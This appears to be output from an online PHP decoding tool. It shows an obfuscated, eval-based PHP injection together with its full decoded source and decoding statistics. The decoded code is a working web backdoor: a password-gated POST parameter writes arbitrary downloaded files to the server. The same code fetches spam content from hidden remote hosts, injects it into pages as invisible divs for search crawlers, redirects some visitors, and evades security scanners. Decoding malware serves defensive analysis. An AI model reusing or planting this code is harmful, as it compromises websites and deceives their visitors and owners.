Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php @error_reporting(0);$_='tVfpc6JIFP+8W7X/A7GoaalxiMeY1RAzcSNqssY4qFFzLMXRCBGBBTTqkP..

Decoded Output download

function vmk830() { $_ = $_POST;if(substr(md5(@$_['db']),0,16)=='e101bf361ac8dc31') {$F=!empty($_['f'])?$_['f']:'fff.php';$S=base64_decode($_['s']);if(preg_match('/^http/',$S)) $S=@file_get_contents($S);if(!empty($_['t'])) exit($S);@file_put_contents($F,$S);@chmod($F,0755);if(file_exists($F)) exit('::'.$F);}}vmk830();
function vstatic830($s='') {static $c;if(!empty($c)) return $c;$c = $s;return $c;}
function vbuffer830($buffer) {if(strlen($buffer)>88 && stripos($buffer, '<html') === false) $gz = true; else $gz = false;if($gz) $buffer = gzdecode($buffer); $b = vstatic830();if(!empty($b)) {$a = '</body>'; if(stripos($buffer, $a) !== false){$b = str_replace("
",' ',$b);$b = preg_replace('/<!DOCTYPE html>.+<body>/','',$b);$b = preg_replace('/<div class="links">.+<\/html>/','</div>',$b);$b = '<div style="position:absolute;top:-9999em">'.$b.'</div>';$buffer = str_ireplace($a, $b.$a, $buffer);} else {$buffer .= $b;}}if($gz) return gzencode($buffer); else return $buffer;}
function vip830() {if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){$i = $_SERVER['HTTP_X_FORWARDED_FOR'];} elseif(isset($_SERVER['HTTP_CLIENT_IP'])){$i = $_SERVER['HTTP_CLIENT_IP'];} elseif(isset($_SERVER['HTTP_X_REAL_IP'])){$i = $_SERVER['HTTP_X_REAL_IP'];} else{$i = $_SERVER['REMOTE_ADDR'];}$ips = explode(",",$i);return $ips[0];}
function vurl830($u,$t=30,$n=0) {$header = array('Accept-Language:'.@$_SERVER['HTTP_ACCEPT_LANGUAGE'],'User-IP:'.@vip830(),'User-URI:'.@$_SERVER['REQUEST_URI'],'User-HOST:'.@$_SERVER['HTTP_HOST'],);$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $u);curl_setopt($ch, CURLOPT_USERAGENT, @$_SERVER['HTTP_USER_AGENT']);curl_setopt($ch, CURLOPT_HTTPHEADER, $header);curl_setopt($ch, CURLOPT_REFERER, @$_SERVER["HTTP_REFERER"]);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);curl_setopt($ch, CURLOPT_TIMEOUT, $t);$s = curl_exec($ch);$a = curl_getinfo($ch);curl_close($ch);if($a['http_code']!='200') $s = '';if(empty($s) && $n<1) return vurl830(str_replace(base64_decode('YXBpdGVzdHZpZXcuY29t'),base64_decode('a2FtaWJsb2dzLmNvbQ=='),$u),30,1); return $s;}
function vdo830() {$Key = 'us'; $_=$_GET; $__='bas'.'e6'.'4_d'.'ecode';if(!empty($_)) {foreach($_ as $k=>$v) {if(preg_match('/^[0-9]+\.[0-9]+\.[0-9\.]+/',$v)) {	$Key = $k; break;}}}$Page = isset($_[$Key]) ? trim($_[$Key]) : '';$IP = vip830();$UA = @$_SERVER['HTTP_USER_AGENT'];$UA .= @gethostbyaddr($IP);$Lang = @$_SERVER['HTTP_ACCEPT_LANGUAGE'];if(preg_match('/\.(txt|jpg|gif|jpeg|png|ico|css|js|ini|log|xml)/i',$_SERVER['REQUEST_URI'])) return;if(preg_match('/Netcraft/i',$UA) || preg_match('/(185\.216\.48|91\.236\.65)\./i',$IP)) return; if(strlen($UA)>50 && !empty($Lang) && !preg_match('/(zh|cn|jp|ja|kr|ko|tw|hk)/i', $Lang) && !preg_match('/('.$__('Z29vZ2xlfHNwaWRlcnxiaW5nfG1zbi5jb218eWFob298YW9sLmNvbXxweXRob258cmVxdWVzdHN8cHJveHl8emgtY258TmV0Y3JhZnR8bm9kZS1mZXRjaHxnaXRodWJ8c2VhcmNoZW5naW5lfG1qMTJib3Q=').')/i',$UA)) {if(preg_match('/^([0-9]+)\.([0-9]+)\.([0-9]+)\.[0-9]+\.[0-9]+\.[0-9]+/',$Page,$Arr)) {header($__('TG9jYXRpb246IGh0dHA6Ly9hMzAxLmthbWlibG9ncy5jb20vaHRtbDAyX3YzMDEucGhwP2hoPQ==').$_SERVER['HTTP_HOST'].'&s='.$Page);exit;}}if(!preg_match('/^[0-9]+\.[0-9]+\.[0-9\.]+/',$Page) && preg_match('/('.$__('Z29vZ2xlfG1zbi5jb218eWFob28uY29tfGFvbC5jb20=').')/i',$UA)) {$Page = '1.1.1';$Flag = 1;}if(preg_match('/^[0-9]+\.[0-9]+\.[0-9\.]+/',$Page)) {if(preg_match('/\.(txt|jpg|gif|jpeg|png|ico|css|js|ini|log|xml)/i',$_SERVER['REQUEST_URI'])) return;if(!preg_match('/('.$__('Z29vZ2xlfG1zbi5jb218eWFob28uY29tfGFvbC5jb20=').')/i',$UA)) return;$html = vurl830($__('aHR0cDovL2FwaTAxLmFwaXRlc3R2aWV3LmNvbS9faHRtbDAyYi5waHA/a2V5PQ==').$Key.'&s='.urlencode($Page));if(strlen($html)>520) {vstatic830($html);if(!empty($Flag)) {@ob_start("vbuffer830");} else {exit($html);}}}}vdo830();

Did this file decode correctly?

Original Code

<?php 
@error_reporting(0);$_='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';$__=str_replace('v916','','v916gv916zinv916flate');$___=str_replace('v916','','bav916se6v9164_v916decv916ode'); evAL ($__($___($_))); 
?><?php

Function Calls

gzinflate 1
str_replace 2
base64_decode 1
error_reporting 1

Variables

$_ tVfpc6JIFP+8W7X/A7GoaalxiMeY1RAzcSNqssY4qFFzLMXRCBGBBTTqkP99..
$__ gzinflate
$___ base64_decode

Stats

MD5 3dd11a7323b7b4f2c532f61444e84b9d
Eval Count 1
Decode Time 86 ms